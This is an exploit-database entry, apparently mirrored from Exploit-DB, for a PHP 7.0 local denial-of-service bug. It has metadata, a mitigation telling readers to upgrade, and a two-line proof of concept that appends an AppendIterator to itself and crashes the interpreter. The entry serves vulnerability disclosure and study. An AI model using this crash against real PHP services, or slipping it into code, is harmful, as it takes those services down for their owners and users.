header-logo
Suggest Exploit
vendor:
PHP
by:
Yakir Wizman
7,5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: PHP
Affected Version From: 7.0
Affected Version To: 7.0
Patch Exists: YES
Related CWE: N/A
CPE: a:php:php:7.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows Server 2012 R2
2016

PHP 7.0 AppendIterator::append Local Denial of Service

This exploit causes a crash in PHP 7.0 when AppendIterator::append is called with the same AppendIterator instance as an argument. This causes an infinite loop in the append method, resulting in a denial of service.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to a version of PHP that is not affected by this issue.
Source

Exploit-DB raw data:

<?php
#############################################################################
## PHP 7.0 AppendIterator::append Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 31/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
$tmp = new AppendIterator();
$tmp->append($tmp); // Crash
?>

Navigation

Suggest Exploit

Services By CQR